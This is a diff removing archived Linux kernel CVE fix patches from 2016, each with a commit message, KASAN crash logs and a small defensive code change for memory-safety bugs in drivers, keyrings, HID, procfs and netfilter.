-structure is no longer accessed beyond that point, otherwise undefined
-behaviour might occur.
-
-Fixes: 2e4c7553cd6f ("usb: gadget: f_fs: add aio support")
-Cc: <stable@vger.kernel.org> # v3.15+
-Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
-Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
----
- drivers/usb/gadget/function/f_fs.c | 5 ++---
- 1 file changed, 2 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/usb/gadget/function/f_fs.c b/drivers/usb/gadget/function/f_fs.c
-index e21ca2bd..15b648c 100644
---- a/drivers/usb/gadget/function/f_fs.c
-+++ b/drivers/usb/gadget/function/f_fs.c
-@@ -646,6 +646,7 @@ static void ffs_user_copy_worker(struct work_struct *work)
- 						   work);
- 	int ret = io_data->req->status ? io_data->req->status :
- 					 io_data->req->actual;
-+	bool kiocb_has_eventfd = io_data->kiocb->ki_flags & IOCB_EVENTFD;
- 
- 	if (io_data->read && ret > 0) {
- 		use_mm(io_data->mm);
-@@ -657,13 +658,11 @@ static void ffs_user_copy_worker(struct work_struct *work)
- 
- 	io_data->kiocb->ki_complete(io_data->kiocb, ret, ret);
- 
--	if (io_data->ffs->ffs_eventfd &&
--	    !(io_data->kiocb->ki_flags & IOCB_EVENTFD))
-+	if (io_data->ffs->ffs_eventfd && !kiocb_has_eventfd)
- 		eventfd_signal(io_data->ffs->ffs_eventfd, 1);
- 
- 	usb_ep_free_request(io_data->ep, io_data->req);
- 
--	io_data->kiocb->private = NULL;
- 	if (io_data->read)
- 		kfree(io_data->to_free);
- 	kfree(io_data->buf);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-7913/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-7913/ANY/0001.patch
deleted file mode 100644
index 26af8224..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7913/ANY/0001.patch
+++ /dev/null
@@ -1,162 +0,0 @@
-From 8dfbcc4351a0b6d2f2d77f367552f48ffefafe18 Mon Sep 17 00:00:00 2001
-From: Mauro Carvalho Chehab <mchehab@osg.samsung.com>
-Date: Thu, 28 Jan 2016 09:22:44 -0200
-Subject: [media] xc2028: avoid use after free
-
-If struct xc2028_config is passed without a firmware name,
-the following trouble may happen:
-
-[11009.907205] xc2028 5-0061: type set to XCeive xc2028/xc3028 tuner
-[11009.907491] ==================================================================
-[11009.907750] BUG: KASAN: use-after-free in strcmp+0x96/0xb0 at addr ffff8803bd78ab40
-[11009.907992] Read of size 1 by task modprobe/28992
-[11009.907994] =============================================================================
-[11009.907997] BUG kmalloc-16 (Tainted: G        W      ): kasan: bad access detected
-[11009.907999] -----------------------------------------------------------------------------
-
-[11009.908008] INFO: Allocated in xhci_urb_enqueue+0x214/0x14c0 [xhci_hcd] age=0 cpu=3 pid=28992
-[11009.908012] 	___slab_alloc+0x581/0x5b0
-[11009.908014] 	__slab_alloc+0x51/0x90
-[11009.908017] 	__kmalloc+0x27b/0x350
-[11009.908022] 	xhci_urb_enqueue+0x214/0x14c0 [xhci_hcd]
-[11009.908026] 	usb_hcd_submit_urb+0x1e8/0x1c60
-[11009.908029] 	usb_submit_urb+0xb0e/0x1200
-[11009.908032] 	usb_serial_generic_write_start+0xb6/0x4c0
-[11009.908035] 	usb_serial_generic_write+0x92/0xc0
-[11009.908039] 	usb_console_write+0x38a/0x560
-[11009.908045] 	call_console_drivers.constprop.14+0x1ee/0x2c0
-[11009.908051] 	console_unlock+0x40d/0x900
-[11009.908056] 	vprintk_emit+0x4b4/0x830
-[11009.908061] 	vprintk_default+0x1f/0x30
-[11009.908064] 	printk+0x99/0xb5
-[11009.908067] 	kasan_report_error+0x10a/0x550
-[11009.908070] 	__asan_report_load1_noabort+0x43/0x50
-[11009.908074] INFO: Freed in xc2028_set_config+0x90/0x630 [tuner_xc2028] age=1 cpu=3 pid=28992
-[11009.908077] 	__slab_free+0x2ec/0x460
-[11009.908080] 	kfree+0x266/0x280
-[11009.908083] 	xc2028_set_config+0x90/0x630 [tuner_xc2028]
-[11009.908086] 	xc2028_attach+0x310/0x8a0 [tuner_xc2028]
-[11009.908090] 	em28xx_attach_xc3028.constprop.7+0x1f9/0x30d [em28xx_dvb]
-[11009.908094] 	em28xx_dvb_init.part.3+0x8e4/0x5cf4 [em28xx_dvb]
-[11009.908098] 	em28xx_dvb_init+0x81/0x8a [em28xx_dvb]
-[11009.908101] 	em28xx_register_extension+0xd9/0x190 [em28xx]
-[11009.908105] 	em28xx_dvb_register+0x10/0x1000 [em28xx_dvb]
-[11009.908108] 	do_one_initcall+0x141/0x300
-[11009.908111] 	do_init_module+0x1d0/0x5ad
-[11009.908114] 	load_module+0x6666/0x9ba0
-[11009.908117] 	SyS_finit_module+0x108/0x130
-[11009.908120] 	entry_SYSCALL_64_fastpath+0x16/0x76
-[11009.908123] INFO: Slab 0xffffea000ef5e280 objects=25 used=25 fp=0x          (null) flags=0x2ffff8000004080
-[11009.908126] INFO: Object 0xffff8803bd78ab40 @offset=2880 fp=0x0000000000000001
-
-[11009.908130] Bytes b4 ffff8803bd78ab30: 01 00 00 00 2a 07 00 00 9d 28 00 00 01 00 00 00  ....*....(......
-[11009.908133] Object ffff8803bd78ab40: 01 00 00 00 00 00 00 00 b0 1d c3 6a 00 88 ff ff  ...........j....
-[11009.908137] CPU: 3 PID: 28992 Comm: modprobe Tainted: G    B   W       4.5.0-rc1+ #43
-[11009.908140] Hardware name:                  /NUC5i7RYB, BIOS RYBDWi35.86A.0350.2015.0812.1722 08/12/2015
-[11009.908142]  ffff8803bd78a000 ffff8802c273f1b8 ffffffff81932007 ffff8803c6407a80
-[11009.908148]  ffff8802c273f1e8 ffffffff81556759 ffff8803c6407a80 ffffea000ef5e280
-[11009.908153]  ffff8803bd78ab40 dffffc0000000000 ffff8802c273f210 ffffffff8155ccb4
-[11009.908158] Call Trace:
-[11009.908162]  [<ffffffff81932007>] dump_stack+0x4b/0x64
-[11009.908165]  [<ffffffff81556759>] print_trailer+0xf9/0x150
-[11009.908168]  [<ffffffff8155ccb4>] object_err+0x34/0x40
-[11009.908171]  [<ffffffff8155f260>] kasan_report_error+0x230/0x550
-[11009.908175]  [<ffffffff81237d71>] ? trace_hardirqs_off_caller+0x21/0x290
-[11009.908179]  [<ffffffff8155e926>] ? kasan_unpoison_shadow+0x36/0x50
-[11009.908182]  [<ffffffff8155f5c3>] __asan_report_load1_noabort+0x43/0x50
-[11009.908185]  [<ffffffff8155ea00>] ? __asan_register_globals+0x50/0xa0
-[11009.908189]  [<ffffffff8194cea6>] ? strcmp+0x96/0xb0
-[11009.908192]  [<ffffffff8194cea6>] strcmp+0x96/0xb0
-[11009.908196]  [<ffffffffa13ba4ac>] xc2028_set_config+0x15c/0x630 [tuner_xc2028]
-[11009.908200]  [<ffffffffa13bac90>] xc2028_attach+0x310/0x8a0 [tuner_xc2028]
-[11009.908203]  [<ffffffff8155ea78>] ? memset+0x28/0x30
-[11009.908206]  [<ffffffffa13ba980>] ? xc2028_set_config+0x630/0x630 [tuner_xc2028]
-[11009.908211]  [<ffffffffa157a59a>] em28xx_attach_xc3028.constprop.7+0x1f9/0x30d [em28xx_dvb]
-[11009.908215]  [<ffffffffa157aa2a>] ? em28xx_dvb_init.part.3+0x37c/0x5cf4 [em28xx_dvb]
-[11009.908219]  [<ffffffffa157a3a1>] ? hauppauge_hvr930c_init+0x487/0x487 [em28xx_dvb]
-[11009.908222]  [<ffffffffa01795ac>] ? lgdt330x_attach+0x1cc/0x370 [lgdt330x]
-[11009.908226]  [<ffffffffa01793e0>] ? i2c_read_demod_bytes.isra.2+0x210/0x210 [lgdt330x]
-[11009.908230]  [<ffffffff812e87d0>] ? ref_module.part.15+0x10/0x10
-[11009.908233]  [<ffffffff812e56e0>] ? module_assert_mutex_or_preempt+0x80/0x80
-[11009.908238]  [<ffffffffa157af92>] em28xx_dvb_init.part.3+0x8e4/0x5cf4 [em28xx_dvb]
-[11009.908242]  [<ffffffffa157a6ae>] ? em28xx_attach_xc3028.constprop.7+0x30d/0x30d [em28xx_dvb]
-[11009.908245]  [<ffffffff8195222d>] ? string+0x14d/0x1f0
-[11009.908249]  [<ffffffff8195381f>] ? symbol_string+0xff/0x1a0
-[11009.908253]  [<ffffffff81953720>] ? uuid_string+0x6f0/0x6f0
-[11009.908257]  [<ffffffff811a775e>] ? __kernel_text_address+0x7e/0xa0
-[11009.908260]  [<ffffffff8104b02f>] ? print_context_stack+0x7f/0xf0
-[11009.908264]  [<ffffffff812e9846>] ? __module_address+0xb6/0x360
-[11009.908268]  [<ffffffff8137fdc9>] ? is_ftrace_trampoline+0x99/0xe0
-[11009.908271]  [<ffffffff811a775e>] ? __kernel_text_address+0x7e/0xa0
-[11009.908275]  [<ffffffff81240a70>] ? debug_check_no_locks_freed+0x290/0x290
-[11009.908278]  [<ffffffff8104a24b>] ? dump_trace+0x11b/0x300
-[11009.908282]  [<ffffffffa13e8143>] ? em28xx_register_extension+0x23/0x190 [em28xx]
-[11009.908285]  [<ffffffff81237d71>] ? trace_hardirqs_off_caller+0x21/0x290
-[11009.908289]  [<ffffffff8123ff56>] ? trace_hardirqs_on_caller+0x16/0x590
-[11009.908292]  [<ffffffff812404dd>] ? trace_hardirqs_on+0xd/0x10
-[11009.908296]  [<ffffffffa13e8143>] ? em28xx_register_extension+0x23/0x190 [em28xx]
-[11009.908299]  [<ffffffff822dcbb0>] ? mutex_trylock+0x400/0x400
-[11009.908302]  [<ffffffff810021a1>] ? do_one_initcall+0x131/0x300
-[11009.908306]  [<ffffffff81296dc7>] ? call_rcu_sched+0x17/0x20
-[11009.908309]  [<ffffffff8159e708>] ? put_object+0x48/0x70
-[11009.908314]  [<ffffffffa1579f11>] em28xx_dvb_init+0x81/0x8a [em28xx_dvb]
-[11009.908317]  [<ffffffffa13e81f9>] em28xx_register_extension+0xd9/0x190 [em28xx]
-[11009.908320]  [<ffffffffa0150000>] ? 0xffffffffa0150000
-[11009.908324]  [<ffffffffa0150010>] em28xx_dvb_register+0x10/0x1000 [em28xx_dvb]
-[11009.908327]  [<ffffffff810021b1>] do_one_initcall+0x141/0x300
-[11009.908330]  [<ffffffff81002070>] ? try_to_run_init_process+0x40/0x40
-[11009.908333]  [<ffffffff8123ff56>] ? trace_hardirqs_on_caller+0x16/0x590
-[11009.908337]  [<ffffffff8155e926>] ? kasan_unpoison_shadow+0x36/0x50
-[11009.908340]  [<ffffffff8155e926>] ? kasan_unpoison_shadow+0x36/0x50
-[11009.908343]  [<ffffffff8155e926>] ? kasan_unpoison_shadow+0x36/0x50
-[11009.908346]  [<ffffffff8155ea37>] ? __asan_register_globals+0x87/0xa0
-[11009.908350]  [<ffffffff8144da7b>] do_init_module+0x1d0/0x5ad
-[11009.908353]  [<ffffffff812f2626>] load_module+0x6666/0x9ba0
-[11009.908356]  [<ffffffff812e9c90>] ? symbol_put_addr+0x50/0x50
-[11009.908361]  [<ffffffffa1580037>] ? em28xx_dvb_init.part.3+0x5989/0x5cf4 [em28xx_dvb]
-[11009.908366]  [<ffffffff812ebfc0>] ? module_frob_arch_sections+0x20/0x20
-[11009.908369]  [<ffffffff815bc940>] ? open_exec+0x50/0x50
-[11009.908374]  [<ffffffff811671bb>] ? ns_capable+0x5b/0xd0
-[11009.908377]  [<ffffffff812f5e58>] SyS_finit_module+0x108/0x130
-[11009.908379]  [<ffffffff812f5d50>] ? SyS_init_module+0x1f0/0x1f0
-[11009.908383]  [<ffffffff81004044>] ? lockdep_sys_exit_thunk+0x12/0x14
-[11009.908394]  [<ffffffff822e6936>] entry_SYSCALL_64_fastpath+0x16/0x76
-[11009.908396] Memory state around the buggy address:
-[11009.908398]  ffff8803bd78aa00: 00 00 fc fc fc fc fc fc fc fc fc fc fc fc fc fc
-[11009.908401]  ffff8803bd78aa80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
-[11009.908403] >ffff8803bd78ab00: fc fc fc fc fc fc fc fc 00 00 fc fc fc fc fc fc
-[11009.908405]                                            ^
-[11009.908407]  ffff8803bd78ab80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
-[11009.908409]  ffff8803bd78ac00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
-[11009.908411] ==================================================================
-
-In order to avoid it, let's set the cached value of the firmware
-name to NULL after freeing it. While here, return an error if
-the memory allocation fails.
-
-Signed-off-by: Mauro Carvalho Chehab <mchehab@osg.samsung.com>
----
- drivers/media/tuners/tuner-xc2028.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/media/tuners/tuner-xc2028.c b/drivers/media/tuners/tuner-xc2028.c
-index 4e941f0..082ff56 100644
---- a/drivers/media/tuners/tuner-xc2028.c
-+++ b/drivers/media/tuners/tuner-xc2028.c
-@@ -1403,11 +1403,12 @@ static int xc2028_set_config(struct dvb_frontend *fe, void *priv_cfg)
- 	 * in order to avoid troubles during device release.
- 	 */
- 	kfree(priv->ctrl.fname);
-+	priv->ctrl.fname = NULL;
- 	memcpy(&priv->ctrl, p, sizeof(priv->ctrl));
- 	if (p->fname) {
- 		priv->ctrl.fname = kstrdup(p->fname, GFP_KERNEL);
- 		if (priv->ctrl.fname == NULL)
--			rc = -ENOMEM;
-+			return -ENOMEM;
- 	}
- 
- 	/*
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-7914/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-7914/ANY/0001.patch
deleted file mode 100644
index 7d535a0a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7914/ANY/0001.patch
+++ /dev/null
@@ -1,112 +0,0 @@
-From 8d4a2ec1e0b41b0cf9a0c5cd4511da7f8e4f3de2 Mon Sep 17 00:00:00 2001
-From: Jerome Marchand <jmarchan@redhat.com>
-Date: Wed, 6 Apr 2016 14:06:48 +0100
-Subject: assoc_array: don't call compare_object() on a node
-
-Changes since V1: fixed the description and added KASan warning.
-
-In assoc_array_insert_into_terminal_node(), we call the
-compare_object() method on all non-empty slots, even when they're
-not leaves, passing a pointer to an unexpected structure to
-compare_object(). Currently it causes an out-of-bound read access
-in keyring_compare_object detected by KASan (see below). The issue
-is easily reproduced with keyutils testsuite.
-Only call compare_object() when the slot is a leave.
-
-KASan warning:
-==================================================================
-BUG: KASAN: slab-out-of-bounds in keyring_compare_object+0x213/0x240 at addr ffff880060a6f838
-Read of size 8 by task keyctl/1655
-=============================================================================
-BUG kmalloc-192 (Not tainted): kasan: bad access detected
------------------------------------------------------------------------------
-
-Disabling lock debugging due to kernel taint
-INFO: Allocated in assoc_array_insert+0xfd0/0x3a60 age=69 cpu=1 pid=1647
-	___slab_alloc+0x563/0x5c0
-	__slab_alloc+0x51/0x90
-	kmem_cache_alloc_trace+0x263/0x300
-	assoc_array_insert+0xfd0/0x3a60
-	__key_link_begin+0xfc/0x270
-	key_create_or_update+0x459/0xaf0
-	SyS_add_key+0x1ba/0x350
-	entry_SYSCALL_64_fastpath+0x12/0x76
-INFO: Slab 0xffffea0001829b80 objects=16 used=8 fp=0xffff880060a6f550 flags=0x3fff8000004080
-INFO: Object 0xffff880060a6f740 @offset=5952 fp=0xffff880060a6e5d1
-
-Bytes b4 ffff880060a6f730: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
-Object ffff880060a6f740: d1 e5 a6 60 00 88 ff ff 0e 00 00 00 00 00 00 00  ...`............
-Object ffff880060a6f750: 02 cf 8e 60 00 88 ff ff 02 c0 8e 60 00 88 ff ff  ...`.......`....
-Object ffff880060a6f760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
-Object ffff880060a6f770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
-Object ffff880060a6f780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
-Object ffff880060a6f790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
-Object ffff880060a6f7a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
-Object ffff880060a6f7b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
-Object ffff880060a6f7c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
-Object ffff880060a6f7d0: 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
-Object ffff880060a6f7e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
-Object ffff880060a6f7f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
-CPU: 0 PID: 1655 Comm: keyctl Tainted: G    B           4.5.0-rc4-kasan+ #291
-Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011
- 0000000000000000 000000001b2800b4 ffff880060a179e0 ffffffff81b60491
- ffff88006c802900 ffff880060a6f740 ffff880060a17a10 ffffffff815e2969
- ffff88006c802900 ffffea0001829b80 ffff880060a6f740 ffff880060a6e650
-Call Trace:
- [<ffffffff81b60491>] dump_stack+0x85/0xc4
- [<ffffffff815e2969>] print_trailer+0xf9/0x150
- [<ffffffff815e9454>] object_err+0x34/0x40
- [<ffffffff815ebe50>] kasan_report_error+0x230/0x550
- [<ffffffff819949be>] ? keyring_get_key_chunk+0x13e/0x210
- [<ffffffff815ec62d>] __asan_report_load_n_noabort+0x5d/0x70
- [<ffffffff81994cc3>] ? keyring_compare_object+0x213/0x240
- [<ffffffff81994cc3>] keyring_compare_object+0x213/0x240
- [<ffffffff81bc238c>] assoc_array_insert+0x86c/0x3a60
- [<ffffffff81bc1b20>] ? assoc_array_cancel_edit+0x70/0x70
- [<ffffffff8199797d>] ? __key_link_begin+0x20d/0x270
- [<ffffffff8199786c>] __key_link_begin+0xfc/0x270
- [<ffffffff81993389>] key_create_or_update+0x459/0xaf0
- [<ffffffff8128ce0d>] ? trace_hardirqs_on+0xd/0x10
- [<ffffffff81992f30>] ? key_type_lookup+0xc0/0xc0
- [<ffffffff8199e19d>] ? lookup_user_key+0x13d/0xcd0
- [<ffffffff81534763>] ? memdup_user+0x53/0x80
- [<ffffffff819983ea>] SyS_add_key+0x1ba/0x350
- [<ffffffff81998230>] ? key_get_type_from_user.constprop.6+0xa0/0xa0
- [<ffffffff828bcf4e>] ? retint_user+0x18/0x23
- [<ffffffff8128cc7e>] ? trace_hardirqs_on_caller+0x3fe/0x580
- [<ffffffff81004017>] ? trace_hardirqs_on_thunk+0x17/0x19
- [<ffffffff828bc432>] entry_SYSCALL_64_fastpath+0x12/0x76
-Memory state around the buggy address:
- ffff880060a6f700: fc fc fc fc fc fc fc fc 00 00 00 00 00 00 00 00
- ffff880060a6f780: 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc fc
->ffff880060a6f800: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
-                                        ^
- ffff880060a6f880: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
- ffff880060a6f900: fc fc fc fc fc fc 00 00 00 00 00 00 00 00 00 00
-==================================================================
-
-Signed-off-by: Jerome Marchand <jmarchan@redhat.com>
-Signed-off-by: David Howells <dhowells@redhat.com>
-cc: stable@vger.kernel.org
----
- lib/assoc_array.c | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/lib/assoc_array.c b/lib/assoc_array.c
-index 03dd576..59fd7c0 100644
---- a/lib/assoc_array.c
-+++ b/lib/assoc_array.c
-@@ -524,7 +524,9 @@ static bool assoc_array_insert_into_terminal_node(struct assoc_array_edit *edit,
- 			free_slot = i;
- 			continue;
- 		}
--		if (ops->compare_object(assoc_array_ptr_to_leaf(ptr), index_key)) {
-+		if (assoc_array_ptr_is_leaf(ptr) &&
-+		    ops->compare_object(assoc_array_ptr_to_leaf(ptr),
-+					index_key)) {
- 			pr_devel("replace in slot %d\n", i);
- 			edit->leaf_p = &node->slots[i];
- 			edit->dead_leaf = node->slots[i];
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-7915/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-7915/ANY/0001.patch
deleted file mode 100644
index a37e499e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7915/ANY/0001.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From 50220dead1650609206efe91f0cc116132d59b3f Mon Sep 17 00:00:00 2001
-From: Benjamin Tissoires <benjamin.tissoires@redhat.com>
-Date: Tue, 19 Jan 2016 12:34:58 +0100
-Subject: HID: core: prevent out-of-bound readings
-
-Plugging a Logitech DJ receiver with KASAN activated raises a bunch of
-out-of-bound readings.
-
-The fields are allocated up to MAX_USAGE, meaning that potentially, we do
-not have enough fields to fit the incoming values.
-Add checks and silence KASAN.
-
-Signed-off-by: Benjamin Tissoires <benjamin.tissoires@redhat.com>
-Signed-off-by: Jiri Kosina <jkosina@suse.cz>
----
- drivers/hid/hid-core.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/drivers/hid/hid-core.c b/drivers/hid/hid-core.c
-index 16c2c66..3f6ac5f 100644
---- a/drivers/hid/hid-core.c
-+++ b/drivers/hid/hid-core.c
-@@ -1293,6 +1293,7 @@ static void hid_input_field(struct hid_device *hid, struct hid_field *field,
- 		/* Ignore report if ErrorRollOver */
- 		if (!(field->flags & HID_MAIN_ITEM_VARIABLE) &&
- 		    value[n] >= min && value[n] <= max &&
-+		    value[n] - min < field->maxusage &&
- 		    field->usage[value[n] - min].hid == HID_UP_KEYBOARD + 1)
- 			goto exit;
- 	}
-@@ -1305,11 +1306,13 @@ static void hid_input_field(struct hid_device *hid, struct hid_field *field,
- 		}
- 
- 		if (field->value[n] >= min && field->value[n] <= max
-+			&& field->value[n] - min < field->maxusage
- 			&& field->usage[field->value[n] - min].hid
- 			&& search(value, field->value[n], count))
- 				hid_process_event(hid, field, &field->usage[field->value[n] - min], 0, interrupt);
- 
- 		if (value[n] >= min && value[n] <= max
-+			&& value[n] - min < field->maxusage
- 			&& field->usage[value[n] - min].hid
- 			&& search(field->value, value[n], count))
- 				hid_process_event(hid, field, &field->usage[value[n] - min], 1, interrupt);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-7916/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-7916/ANY/0001.patch
deleted file mode 100644
index 310cb3ec..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7916/ANY/0001.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From 8148a73c9901a8794a50f950083c00ccf97d43b3 Mon Sep 17 00:00:00 2001
-From: Mathias Krause <minipli@googlemail.com>
-Date: Thu, 5 May 2016 16:22:26 -0700
-Subject: proc: prevent accessing /proc/<PID>/environ until it's ready
-
-If /proc/<PID>/environ gets read before the envp[] array is fully set up
-in create_{aout,elf,elf_fdpic,flat}_tables(), we might end up trying to
-read more bytes than are actually written, as env_start will already be
-set but env_end will still be zero, making the range calculation
-underflow, allowing to read beyond the end of what has been written.
-
-Fix this as it is done for /proc/<PID>/cmdline by testing env_end for
-zero.  It is, apparently, intentionally set last in create_*_tables().
-
-This bug was found by the PaX size_overflow plugin that detected the
-arithmetic underflow of 'this_len = env_end - (env_start + src)' when
-env_end is still zero.
-
-The expected consequence is that userland trying to access
-/proc/<PID>/environ of a not yet fully set up process may get
-inconsistent data as we're in the middle of copying in the environment
-variables.
-
-Fixes: https://forums.grsecurity.net/viewtopic.php?f=3&t=4363
-Fixes: https://bugzilla.kernel.org/show_bug.cgi?id=116461
-Signed-off-by: Mathias Krause <minipli@googlemail.com>
-Cc: Emese Revfy <re.emese@gmail.com>
-Cc: Pax Team <pageexec@freemail.hu>
-Cc: Al Viro <viro@zeniv.linux.org.uk>
-Cc: Mateusz Guzik <mguzik@redhat.com>
-Cc: Alexey Dobriyan <adobriyan@gmail.com>
-Cc: Cyrill Gorcunov <gorcunov@openvz.org>
-Cc: Jarod Wilson <jarod@redhat.com>
-Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- fs/proc/base.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/fs/proc/base.c b/fs/proc/base.c
-index b1755b2..92e37e2 100644
---- a/fs/proc/base.c
-+++ b/fs/proc/base.c
-@@ -955,7 +955,8 @@ static ssize_t environ_read(struct file *file, char __user *buf,
- 	struct mm_struct *mm = file->private_data;
- 	unsigned long env_start, env_end;
- 
--	if (!mm)
-+	/* Ensure the process spawned far enough to have an environment. */
-+	if (!mm || !mm->env_end)
- 		return 0;
- 
- 	page = (char *)__get_free_page(GFP_TEMPORARY);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-7917/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-7917/ANY/0001.patch
deleted file mode 100644
index 6cbbe4e2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7917/ANY/0001.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From c58d6c93680f28ac58984af61d0a7ebf4319c241 Mon Sep 17 00:00:00 2001
-From: Phil Turnbull <phil.turnbull@oracle.com>
-Date: Tue, 2 Feb 2016 13:36:45 -0500
-Subject: netfilter: nfnetlink: correctly validate length of batch messages
-
-If nlh->nlmsg_len is zero then an infinite loop is triggered because
-'skb_pull(skb, msglen);' pulls zero bytes.
-
-The calculation in nlmsg_len() underflows if 'nlh->nlmsg_len <
-NLMSG_HDRLEN' which bypasses the length validation and will later
-trigger an out-of-bound read.
-
-If the length validation does fail then the malformed batch message is
-copied back to userspace. However, we cannot do this because the
-nlh->nlmsg_len can be invalid. This leads to an out-of-bounds read in
-netlink_ack:
-
-    [   41.455421] ==================================================================
-    [   41.456431] BUG: KASAN: slab-out-of-bounds in memcpy+0x1d/0x40 at addr ffff880119e79340
-    [   41.456431] Read of size 4294967280 by task a.out/987
-    [   41.456431] =============================================================================
-    [   41.456431] BUG kmalloc-512 (Not tainted): kasan: bad access detected
-    [   41.456431] -----------------------------------------------------------------------------
-    ...
-    [   41.456431] Bytes b4 ffff880119e79310: 00 00 00 00 d5 03 00 00 b0 fb fe ff 00 00 00 00  ................
-    [   41.456431] Object ffff880119e79320: 20 00 00 00 10 00 05 00 00 00 00 00 00 00 00 00   ...............
-    [   41.456431] Object ffff880119e79330: 14 00 0a 00 01 03 fc 40 45 56 11 22 33 10 00 05  .......@EV."3...
-    [   41.456431] Object ffff880119e79340: f0 ff ff ff 88 99 aa bb 00 14 00 0a 00 06 fe fb  ................
-                                            ^^ start of batch nlmsg with
-                                               nlmsg_len=4294967280
-    ...
-    [   41.456431] Memory state around the buggy address:
-    [   41.456431]  ffff880119e79400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-    [   41.456431]  ffff880119e79480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-    [   41.456431] >ffff880119e79500: 00 00 00 00 fc fc fc fc fc fc fc fc fc fc fc fc
-    [   41.456431]                                ^
-    [   41.456431]  ffff880119e79580: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
-    [   41.456431]  ffff880119e79600: fc fc fc fc fc fc fc fc fc fc fb fb fb fb fb fb
-    [   41.456431] ==================================================================
-
-Fix this with better validation of nlh->nlmsg_len and by setting
-NFNL_BATCH_FAILURE if any batch message fails length validation.
-
-CAP_NET_ADMIN is required to trigger the bugs.
-
-Fixes: 9ea2aa8b7dba ("netfilter: nfnetlink: validate nfnetlink header from batch")
-Signed-off-by: Phil Turnbull <phil.turnbull@oracle.com>
-Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
----
- net/netfilter/nfnetlink.c | 10 ++++++----
- 1 file changed, 6 insertions(+), 4 deletions(-)
-
-diff --git a/net/netfilter/nfnetlink.c b/net/netfilter/nfnetlink.c
-index 62e92af..857ae89 100644
---- a/net/netfilter/nfnetlink.c
-+++ b/net/netfilter/nfnetlink.c
-@@ -328,10 +328,12 @@ replay:
- 		nlh = nlmsg_hdr(skb);
- 		err = 0;
- 
--		if (nlmsg_len(nlh) < sizeof(struct nfgenmsg) ||
--		    skb->len < nlh->nlmsg_len) {
--			err = -EINVAL;
--			goto ack;
-+		if (nlh->nlmsg_len < NLMSG_HDRLEN ||
-+		    skb->len < nlh->nlmsg_len ||
-+		    nlmsg_len(nlh) < sizeof(struct nfgenmsg)) {
-+			nfnl_err_reset(&err_list);
-+			status |= NFNL_BATCH_FAILURE;
-+			goto done;
- 		}
- 
- 		/* Only requests are handled by the kernel */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8391/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8391/ANY/0001.patch
deleted file mode 100644
index 5db9e5c2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8391/ANY/0001.patch
+++ /dev/null
@@ -1,79 +0,0 @@
-From 30a4f0783d2978e27a8b8856d8e358ccaf5ddab4 Mon Sep 17 00:00:00 2001
-From: Walter Yang <yandongy@codeaurora.org>
-Date: Thu, 13 Oct 2016 10:48:39 +0800
-Subject: ASoC: msm: lock read/write when add/free audio ion memory
-
-As read/write get access to ion memory region as well, it's
-necessary to lock them when ion memory is about to be added/freed
-to avoid racing cases.
-
-CRs-Fixed: 1071809
-Change-Id: I436ead23c93384961b38ca99b9312a40c50ad03a
-Signed-off-by: Walter Yang <yandongy@codeaurora.org>
----
- arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c | 20 +++++++++++++++++---
- 1 file changed, 17 insertions(+), 3 deletions(-)
-
-diff --git a/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c b/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c
-index 5bdd10a..4455368 100644
